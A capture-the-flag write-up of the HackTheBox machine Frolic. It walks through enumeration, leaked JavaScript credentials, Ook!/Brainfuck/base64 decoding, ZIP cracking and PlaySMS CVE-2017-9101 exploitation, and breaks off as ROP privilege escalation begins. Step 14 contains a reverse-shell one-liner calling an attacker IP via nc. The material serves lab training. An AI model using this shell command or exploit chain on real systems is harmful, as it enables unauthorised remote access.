0x00 Lab skills overview
Skills covered in this chapter: directory enumeration, sensitive information leaked in JavaScript source, Ook! encoding/decoding, base64 encoding/decoding, writing out an archive from a PK header, archive password cracking, Brainfuck encoding/decoding, exploitation of CVE-2017-9101, Return-oriented programming, buffer overflows, writing an exploit script
Reference: https://www.jgeek.cn/article/74#3_354
Reference: https://0xdf.gitlab.io/2019/03/23/htb-frolic.html
0x01 Obtaining user access
1. Target IP address: 10.10.10.111
2. Port scan for open services
```
┌─[us-vip-22]─[10.10.14.2]─[htb-shiyan@htb-sozld0isvs]─[~/Desktop]
└──╼ [★]$ sudo nmap -sC -sV -T4 10.10.10.111
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-16 03:34 GMT
Nmap scan report for 10.10.10.111
Host is up (0.11s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 877b912a0f11b6571ecb9f77cf35e221 (RSA)
|   256 b79b06ddc25e284478411e677d1eb762 (ECDSA)
|_  256 21cf166d82a430c3c69cd738bab502b0 (ED25519)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
9999/tcp open  http        nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time:
|   date: 2023-12-16T03:34:37
|_  start_date: N/A
| smb2-security-mode:
|   311:
|_    Message signing enabled but not required
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: frolic
|   NetBIOS computer name: FROLIC\x00
|   Domain name: \x00
|   FQDN: frolic
|_  System time: 2023-12-16T09:04:37+05:30
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: FROLIC, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
|_clock-skew: mean: -1h49m59s, deviation: 3h10m31s, median: 0s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.12 seconds
```

Four ports: SSH (22), Samba (139/445) and an nginx site on the non-standard port 9999. The SMB scripts already show guest access works and message signing is disabled, so the shares are worth a quick look before moving to the web server.
3. Check what SMB exposes
```
┌─[us-vip-22]─[10.10.14.2]─[htb-shiyan@htb-sozld0isvs]─[~/Desktop]
└──╼ [★]$ smbclient -L 10.10.10.111
Password for [WORKGROUP\htb-shiyan]:

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	IPC$            IPC       IPC Service (frolic server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

┌─[us-vip-22]─[10.10.14.2]─[htb-shiyan@htb-sozld0isvs]─[~/Desktop]
└──╼ [★]$ smbmap -H 10.10.10.111 -u null -p null
[+] Guest session   	IP: 10.10.10.111:445	Name: 10.10.10.111
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	print$                                            	NO ACCESS	Printer Drivers
	IPC$                                              	NO ACCESS	IPC Service (frolic server (Samba, Ubuntu))
```

Only the default print$ and IPC$ shares exist and neither is readable as guest, so SMB is a dead end; the attack surface is the web server on port 9999.
4. Obtain a username and password from the website on port 9999
Browse to the admin directory http://10.10.10.111:9999/admin and read the source of the login script (view-source:http://10.10.10.111:9999/admin/js/login.js):

```javascript
var attempt = 3; // Variable to count number of attempts.
// Below function Executes on click of login button.
function validate(){
    var username = document.getElementById("username").value;
    var password = document.getElementById("password").value;
    if ( username == "admin" && password == "superduperlooperpassword_lol"){
        alert ("Login successfully");
        window.location = "success.html"; // Redirecting to other page.
        return false;
    }
    else{
        attempt --;// Decrementing by one.
        alert("You have left "+attempt+" attempt;");
        // Disabling fields after 3 attempts.
        if( attempt == 0){
            document.getElementById("username").disabled = true;
            document.getElementById("password").disabled = true;
            document.getElementById("submit").disabled = true;
            return false;
        }
    }
}
```

The credential check runs entirely in the browser with the password in plaintext, and the three-attempt lockout is only a JavaScript variable that resets on reload, so it offers no protection at all. The "success" page is also just a static file (success.html) that can be requested directly.
5. Use the recovered credentials on the admin login page
admin
superduperlooperpassword_lol
http://10.10.10.111:9999/admin/success.html
```
..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... ..... ..... ..... ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?.. ..... ..... ....! ..... ..... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !...! ..... ..... .!.!! !!!!! !!!!! !!!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !!!!! .?... ..... ..... ....! ?!!.? ..... ..... ..... .?.?! .?... ..... ..... ...!. !!!!! !!.?. ..... .!?!! .?... ...?. ?!.?. ..... ..!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!!!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.?. ..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... !.... ..... ..!.! !!!!! !.!!! !!... ..... ..... ....! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!!! !!!!! !!!!! .?... ....! ?!!.? ..... .?.?! .?... ..... ....! .?... ..... ..... ..!?! !.?.. ..... ..... ..?.? !.?.. !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !!!!! !!... ..... ...!. ?.... ..... !?!!. ?!!!! !!!!? .?!.? !!!!! !!!!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!.! !!!!! !!!!! !!!!! !.... ..... ..... ..... !.!.? ..... ..... .!?!! .?!!! !!!!! !!?.? !.?!! !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?.... ..... ..... ..!.. ..... ..... .!.?. ..... ...!? !!.?! !!!!! !!?.? !.?!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!.?. ..... ...!? !!.?. ..... ..?.? !.?.. !.!!! !!!!! !!!!! !!!!! !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! !!.!! !!!!! ..... ..!.! !!!!! !.?.
```
6. The page contains an encoded string. The groups of `.`, `?` and `!` are the short form of Ook! (a Brainfuck dialect in which every instruction is a pair of these symbols); running it with the decoder below prints a path:

```
https://www.dcode.fr/ook-language
Nothing here check /asdiSIAJJ0QWE9JAS
```
7. That gives a directory name; visit it and look at the source

```
view-source:http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/

UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwABBAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbsK1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmveEMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTjlurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkCAAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUGAAAAAAEAAQBPAAAAAwEAAAAA

┌──(kali㉿kali)-[~/桌面]
└─$ echo UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwABBAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbsK1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmveEMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTjlurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkCAAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUGAAAAAAEAAQBPAAAAAwEAAAAA | base64 -d
PK É7M ^D�J�s�h�)�P�n ��Ss�Jw▒��4��k�z��UȖ�+X��P��ᶇ��л�x_�N�[���S��8�����J2S�*�DЍ}�8dTQk������j_���▒���'xc��ݏt��75Q� ���k,4��b)�4F�� ���������&q2o�WԜ�9P#�[�iPK É7M#�[�i ▒��index.phpUT�|�[ux PKO

┌──(kali㉿kali)-[~/桌面]
└─$ echo UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwABBAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbsK1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmveEMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTjlurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkCAAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUGAAAAAAEAAQBPAAAAAwEAAAAA | base64 -d > 1.zip
```

The blob begins with `UEsDB`, which is base64 for the bytes `PK\x03\x04`, the ZIP local file header signature; the decoded output also shows the file name `index.php` in clear text, because ZIP encryption protects only entry contents, not the headers.
8. The decoded data is a ZIP archive, but it is password-protected, so crack it with zip2john and john

```
┌──(kali㉿kali)-[~/桌面]
└─$ zip2john 1.zip > hashzip
ver 2.0 efh 5455 efh 7875 1.zip/index.php PKZIP Encr: TS_chk, cmplen=176, decmplen=617, crc=145BFE23 ts=89C3 cs=89c3 type=8

┌──(kali㉿kali)-[~/桌面]
└─$ john ./hashzip
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 3 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
password         (1.zip/index.php)
1g 0:00:00:00 DONE 2/3 (2023-12-16 13:23) 50.00g/s 9059Kp/s 9059Kc/s 9059KC/s 123456..Sssing
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

┌──(kali㉿kali)-[~/桌面]
└─$ unzip 1.zip
Archive:  1.zip
[1.zip] index.php password:
  inflating: index.php
```

The archive uses legacy ZipCrypto (john's PKZIP format), which is fast to attack offline, and the password turns out to be `password`, found in john's default wordlist within a second.
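The steps above (recognise the PK header, note that the entry is encrypted, crack the password, extract) can all be checked offline from the blob itself. The following is an added example, not code from the original page: it parses the ZIP local file header and end-of-central-directory record by hand, reproducing the fields zip2john printed (compressed/decompressed length, CRC, timestamp, extra-field IDs 5455 and 7875), and then uses Python's standard `zipfile` module with the cracked password to decrypt `index.php`. The base64 string is the one served at /asdiSIAJJ0QWE9JAS on the box; the password `password` is john's result from the page.

```python
import base64
import io
import struct
import zipfile

# Base64 blob served at http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS (copied from the page).
ZIP_B64 = (
    "UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwABBAAA"
    "AAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbsK1i6f+BQ"
    "yOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmveEMrX4+T7al+f"
    "i/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTjlurp78cmcTJviFfU"
    "nOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkCAAAJABgAAAAAAAEAAACk"
    "gQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUGAAAAAAEAAQBPAAAAAwEAAAAA"
)

LOCAL_SIG = b"PK\x03\x04"       # local file header
EOCD_SIG = b"PK\x05\x06"        # end of central directory
FLAG_ENCRYPTED = 0x0001         # general-purpose bit 0: entry is encrypted
FLAG_DATA_DESCRIPTOR = 0x0008   # bit 3: crc/sizes repeated after the data (zip2john's "TS_chk")


def decode_blob(b64: str) -> bytes:
    """base64 -> bytes, refusing anything that does not start with a PK local header."""
    data = base64.b64decode(b64)
    if not data.startswith(LOCAL_SIG):
        raise ValueError("no PK\\x03\\x04 local file header at offset 0")
    return data


def parse_local_header(data: bytes, offset: int = 0) -> dict:
    """Parse the fixed 30-byte local file header plus the file name and extra-field IDs."""
    if data[offset:offset + 4] != LOCAL_SIG:
        raise ValueError("no local file header at offset %d" % offset)
    (version, flags, method, mtime, mdate, crc, csize, usize,
     name_len, extra_len) = struct.unpack_from("<HHHHHIIIHH", data, offset + 4)
    name_start = offset + 30
    name = data[name_start:name_start + name_len].decode("utf-8", "replace")
    extra = data[name_start + name_len:name_start + name_len + extra_len]
    # The extra field is a list of (id, size, payload) records, e.g. 0x5455 "UT" timestamps.
    extra_ids, pos = [], 0
    while pos + 4 <= len(extra):
        eid, esize = struct.unpack_from("<HH", extra, pos)
        extra_ids.append(eid)
        pos += 4 + esize
    return {
        "name": name, "version": version, "method": method, "flags": flags,
        "encrypted": bool(flags & FLAG_ENCRYPTED),
        "data_descriptor": bool(flags & FLAG_DATA_DESCRIPTOR),
        "mtime": mtime, "mdate": mdate, "crc": crc, "csize": csize, "usize": usize,
        "extra_ids": extra_ids,
        "data_offset": name_start + name_len + extra_len,
    }


def parse_eocd(data: bytes) -> dict:
    """End-of-central-directory record: how many entries, and where the central directory is."""
    pos = data.rfind(EOCD_SIG)
    if pos < 0:
        raise ValueError("no end-of-central-directory record (truncated archive?)")
    (_disk, _cd_disk, _entries_here, entries, cd_size,
     cd_offset, _comment_len) = struct.unpack_from("<HHHHIIH", data, pos + 4)
    return {"entries": entries, "cd_size": cd_size, "cd_offset": cd_offset}


def read_entry(data: bytes, name: str, password: bytes) -> bytes:
    """Decrypt (ZipCrypto) and inflate one entry with the stdlib, using the cracked password."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.read(name, pwd=password)


if __name__ == "__main__":
    data = decode_blob(ZIP_B64)
    hdr = parse_local_header(data)
    print(hdr)                  # compare crc/csize/usize/mtime with the zip2john line above
    print(parse_eocd(data))
    body = read_entry(data, hdr["name"], b"password")   # "password" is john's result on the page
    print(body.decode())
```

Everything the header parser reports (`index.php`, deflate, encrypted, CRC 145BFE23, 176/617 bytes, timestamp 89C3, extra fields 5455 and 7875) is visible without the password; only the 176 bytes of entry data are protected, which is why a wordlist attack on the single-entry archive is enough.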
9. The archive contains an index.php; inspect it

```
┌──(kali㉿kali)-[~/桌面]
└─$ cat index.php
4b7973724b7973674b7973724b7973675779302b4b7973674b7973724b7973674b79737250463067506973724b7973674b7934744c5330674c5330754b7973674b7973724b7973674c6a77720d0a4b7973675779302b4b7973674b7a78645069734b4b797375504373674b7974624c5434674c53307450463067506930744c5330674c5330754c5330674c5330744c5330674c6a77724b7973670d0a4b317374506973674b79737250463067506973724b793467504373724b3173674c5434744c53304b5046302b4c5330674c6a77724b7973675779302b4b7973674b7a7864506973674c6930740d0a4c533467504373724b3173674c5434744c5330675046302b4c5330674c5330744c533467504373724b7973675779302b4b7973674b7973385854344b4b7973754c6a776743673d3d0d0a

┌──(kali㉿kali)-[~/桌面]
└─$ xxd -p -r index.php
KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwr
KysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysg
K1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0t
LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg==

shiyan@InfoSec ~ % echo KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwrKysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysgK1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0tLS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg== | base64 -d
+++++ +++++ [->++ +++++ +++<] >++++ +.--- --.++ +++++ .<+++ [->++ +<]>+
++.<+ ++[-> ---<] >---- --.-- ----- .<+++ +[->+ +++<] >+++. <+++[ ->---
<]>-- .<+++ [->++ +<]>+ .---. <+++[ ->--- <]>-- ----. <++++ [->++ ++<]>
++..<
```

The file is only hex digits, so `xxd -p -r` turns it back into bytes; those bytes are base64 (note the `==` padding), and the base64 decodes to a Brainfuck program.
10. Still an encoded string, this time Brainfuck; decode it with the site below

```
https://www.dcode.fr/brainfuck-language
idkwhatispass
```
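Both decoders used above (Ook! in step 6 and Brainfuck in step 10) are the same thing: Ook! is Brainfuck with each instruction spelled as a pair of `.`, `?`, `!` symbols. The block below is an added example, not code from the page or from dcode: a small Brainfuck interpreter, an Ook!-to-Brainfuck translator that accepts both the long form ("Ook. Ook?") and the short form used on success.html, and the hex → base64 → Brainfuck chain for index.php. The Ook! text and the hex are copied from the page; the 30000-cell tape, 8-bit wrap-around and step limit are the interpreter's own choices.

```python
import base64

# Short-form Ook! from http://10.10.10.111:9999/admin/success.html (copied from the page).
OOK_SRC = """
..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... ..... ..... ..... ..... ..!.?
..... ..... .!?!! .?... ..... ..?.? !.?.. ..... ..... ....! ..... ..... .!.?. ..... .!?!!
.?!!! !!!?. ?!.?! !!!!! !...! ..... ..... .!.!! !!!!! !!!!! !!!.? ..... ..... ..... ..!?!
!.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !!!!! .?... ..... ..... ....! ?!!.? ..... .....
..... .?.?! .?... ..... ..... ...!. !!!!! !!.?. ..... .!?!! .?... ...?. ?!.?. ..... ..!.?
..... ..!?! !.?!! !!!!? .?!.? !!!!! !!!!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!!
?.?!. ?!!!! !!!!! !!.?. ..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... !....
..... ..!.! !!!!! !.!!! !!... ..... ..... ....! .?... ..... ..... ....! ?!!.? !!!!! !!!!!
!!!!! !?.?! .?!!! !!!!! !!!!! !!!!! !!!!! .?... ....! ?!!.? ..... .?.?! .?... ..... ....!
.?... ..... ..... ..!?! !.?.. ..... ..... ..?.? !.?.. !.?.. ..... ..!?! !.?.. ..... .?.?!
.?... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !!!!! !!... ..... ...!. ?.... ..... !?!!.
?!!!! !!!!? .?!.? !!!!! !!!!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!.! !!!!! !!!!! !!!!!
!.... ..... ..... ..... !.!.? ..... ..... .!?!! .?!!! !!!!! !!?.? !.?!! !.?.. ..... ....!
?!!.? ..... ..... ?.?!. ?.... ..... ..... ..!.. ..... ..... .!.?. ..... ...!? !!.?! !!!!!
!!?.? !.?!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!.?. ..... ...!? !!.?. ..... ..?.?
!.?.. !.!!! !!!!! !!!!! !!!!! !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... .....
..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! !!.!! !!!!! ..... ..!.! !!!!! !.?.
"""

# Contents of index.php from the cracked archive (copied from the page; 0d0a are the CRLFs).
INDEX_PHP_HEX = (
    "4b7973724b7973674b7973724b7973675779302b4b7973674b7973724b7973674b79737250463067506973724b7973674b7934744c5330674c5330754b7973674b7973724b7973674c6a77720d0a"
    "4b7973675779302b4b7973674b7a78645069734b4b797375504373674b7974624c5434674c53307450463067506930744c5330674c5330754c5330674c5330744c5330674c6a77724b7973670d0a"
    "4b317374506973674b79737250463067506973724b793467504373724b3173674c5434744c53304b5046302b4c5330674c6a77724b7973675779302b4b7973674b7a7864506973674c6930740d0a"
    "4c533467504373724b3173674c5434744c5330675046302b4c5330674c5330744c533467504373724b7973675779302b4b7973674b7973385854344b4b7973754c6a776743673d3d0d0a"
)

# Ook! pairs -> Brainfuck; "Ook." is '.', "Ook?" is '?', "Ook!" is '!'.
OOK_TABLE = {".?": ">", "?.": "<", "..": "+", "!!": "-",
             "!.": ".", ".!": ",", "!?": "[", "?!": "]"}


def ook_to_brainfuck(src: str) -> str:
    """Accept long or short Ook!: only the . ? ! symbols carry meaning, everything else is noise."""
    syms = [c for c in src if c in ".?!"]
    if len(syms) % 2:
        raise ValueError("odd number of Ook! symbols: the text is truncated")
    return "".join(OOK_TABLE[a + b] for a, b in zip(syms[::2], syms[1::2]))


def run_brainfuck(src: str, max_steps: int = 1_000_000) -> str:
    """Minimal Brainfuck interpreter: 30000 8-bit cells, ',' reads EOF as 0, bounded step count."""
    code = [c for c in src if c in "<>+-.,[]"]
    jump, stack = {}, []                      # precompute matching brackets
    for i, c in enumerate(code):
        if c == "[":
            stack.append(i)
        elif c == "]":
            if not stack:
                raise ValueError("unmatched ']' at instruction %d" % i)
            j = stack.pop()
            jump[i], jump[j] = j, i
    if stack:
        raise ValueError("unmatched '[' at instruction %d" % stack[-1])
    tape, ptr, pc, out, steps = [0] * 30000, 0, 0, [], 0
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded (non-terminating program?)")
        c = code[pc]
        if c == ">":
            ptr += 1
        elif c == "<":
            ptr -= 1
        elif c == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif c == ".":
            out.append(chr(tape[ptr]))
        elif c == ",":
            tape[ptr] = 0
        elif c == "[" and tape[ptr] == 0:
            pc = jump[pc]
        elif c == "]" and tape[ptr] != 0:
            pc = jump[pc]
        pc += 1
    return "".join(out)


def run_ook(src: str) -> str:
    return run_brainfuck(ook_to_brainfuck(src))


def decode_index_php(hex_text: str) -> str:
    """index.php is hex -> base64 -> Brainfuck source (b64decode skips the embedded CRLFs)."""
    raw = bytes.fromhex("".join(hex_text.split()))
    return base64.b64decode(raw).decode("ascii")


if __name__ == "__main__":
    print(run_ook(OOK_SRC))                              # page: Nothing here check /asdiSIAJJ0QWE9JAS
    print(run_brainfuck(decode_index_php(INDEX_PHP_HEX)))  # page: idkwhatispass
```

Running the program locally instead of pasting it into a web decoder also keeps CTF or engagement data off third-party sites; the interpreter's bracket check and step limit mean a corrupted copy fails loudly rather than hanging.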
11. We now have a password but no idea where it belongs; the obvious places (SSH, the SMB shares) do not accept it, so keep enumerating directories

```
python3 dirsearch.py -u http://10.10.10.111:9999 -r -R 3 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 50

http://10.10.10.111:9999/backup/
    password.txt
    user.txt
    loop/
http://10.10.10.111:9999/test/
http://10.10.10.111:9999/dev/backup/
```
12. Following that directory leads to a PlaySMS installation; the username admin with the password idkwhatispass logs in to the CMS successfully.
13. Search for public exploits for this framework
```
┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit playsms
------------------------------------------------------- ---------------------------------
 Exploit Title                                         |  Path
------------------------------------------------------- ---------------------------------
PlaySMS - 'import.php' (Authenticated) CSV File Upload | php/remote/44598.rb
PlaySMS - index.php Unauthenticated Template Injection | php/remote/48335.rb
PlaySms 0.7 - SQL Injection                            | linux/remote/404.pl
PlaySms 0.8 - 'index.php' Cross-Site Scripting         | php/webapps/26871.txt
PlaySms 0.9.3 - Multiple Local/Remote File Inclusions  | php/webapps/7687.txt
PlaySms 0.9.5.2 - Remote File Inclusion                | php/webapps/17792.txt
PlaySms 0.9.9.2 - Cross-Site Request Forgery           | php/webapps/30177.txt
PlaySMS 1.4 - '/sendfromfile.php' Remote Code Executio | php/webapps/42003.txt
PlaySMS 1.4 - 'import.php' Remote Code Execution       | php/webapps/42044.txt
PlaySMS 1.4 - 'sendfromfile.php?Filename' (Authenticat | php/remote/44599.rb
PlaySMS 1.4 - Remote Code Execution                    | php/webapps/42038.txt
PlaySMS 1.4.3 - Template Injection / Remote Code Execu | php/webapps/48199.txt
------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit -m php/webapps/42044.txt
  Exploit: PlaySMS 1.4 - 'import.php' Remote Code Execution
      URL: https://www.exploit-db.com/exploits/42044
     Path: /usr/share/exploitdb/exploits/php/webapps/42044.txt
    Codes: CVE-2017-9101
 Verified: True
File Type: HTML document, ASCII text
Copied to: /home/kali/桌面/42044.txt
```
14. Searching around for CVE-2017-9101 turns up a working exploit script; with it we get a shell and the first flag. CVE-2017-9101 is an authenticated remote code execution in the phonebook CSV import (import.php) of PlaySMS 1.4: the script logs in with the admin credentials found above, fetches the CSRF token, uploads a crafted CSV and the injected command runs as the web server user (www-data). Save the script from the link below as cve-2017-9101.py.

```
https://raw.githubusercontent.com/jasperla/CVE-2017-9101/03ceed61209b805a02ca27d57cc2e7a4b51b5288/playsmshell.py

┌──(kali㉿kali)-[~/桌面]
└─$ touch cve-2017-9101.py

┌──(kali㉿kali)-[~/桌面]
└─$ python3 cve-2017-9101.py --url http://10.10.10.111:9999/playsms --password idkwhatispass -c id
[*] Grabbing CSRF token for login
[*] Attempting to login as admin
[+] Logged in !
[*] Grabbing CSRF token for phonebook import
[*] Attempting to execute payload
uid=33(www-data) gid=33(www-data) groups=33(www-data)

┌──(kali㉿kali)-[~/桌面]
└─$ python3 cve-2017-9101.py --url http://10.10.10.111:9999/playsms --password idkwhatispass -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.10 443 >/tmp/f"
[*] Grabbing CSRF token for login
[*] Attempting to login as admin
[+] Logged in !
[*] Grabbing CSRF token for phonebook import
[*] Attempting to execute payload

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.111] 39362
bash: cannot set terminal process group (1200): Inappropriate ioctl for device
bash: no job control in this shell
www-data@frolic:~/html/playsms$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@frolic:~/html/playsms$ ls -la /home/
total 16
drwxr-xr-x  4 root  root  4096 Sep  9  2022 .
drwxr-xr-x 22 root  root  4096 Sep  9  2022 ..
drwxr-xr-x  3 ayush ayush 4096 Sep  9  2022 ayush
drwxr-xr-x  7 sahay sahay 4096 Sep  9  2022 sahay
www-data@frolic:~/html/playsms$ ls -la /home/ayush
total 28
drwxr-xr-x 3 ayush ayush 4096 Sep  9  2022 .
drwxr-xr-x 4 root  root  4096 Sep  9  2022 ..
lrwxrwxrwx 1 root  root     9 Sep  9  2022 .bash_history -> /dev/null
-rw-r--r-- 1 ayush ayush  220 Sep 23  2018 .bash_logout
-rw-r--r-- 1 ayush ayush 3771 Sep 23  2018 .bashrc
drwxrwxr-x 2 ayush ayush 4096 Sep  9  2022 .binary
-rw-r--r-- 1 ayush ayush  655 Sep 23  2018 .profile
-rwxr-xr-x 1 ayush ayush   33 Dec 16 10:07 user.txt
www-data@frolic:~/html/playsms$ cat /home/ayush/user.txt
496365c58a5f5e5ba2460b11aed9e595
```

user.txt is world-readable, so the flag is available to www-data without ever becoming ayush; the unusual `.binary` directory in the same home is the lead for privilege escalation.
0x02 Obtaining root
15. Following the reference write-ups, there is a binary called rop in ayush's home directory
ROP (Return-oriented programming) is a memory-corruption exploitation technique: instead of injecting code, the attacker overwrites the stack with a chain of addresses of code fragments ("gadgets") that already exist in the program or its libraries, so execution flows through them after each `ret`. It defeats defences such as non-executable memory (NX/DEP) and code signing because no new code is introduced. The payload used below is the simplest form, ret2libc: one return into libc's system() with "/bin/sh" as its argument.
```
www-data@frolic:~/html/playsms$ ls -la /home/ayush/.binary/rop
-rwsr-xr-x 1 root root 7480 Sep 25  2018 /home/ayush/.binary/rop
www-data@frolic:~/html/playsms$ cd /home/ayush/.binary/
www-data@frolic:/home/ayush/.binary$ ls
rop
www-data@frolic:/home/ayush/.binary$ ldd rop
	linux-gate.so.1 =>  (0xb7fda000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000)
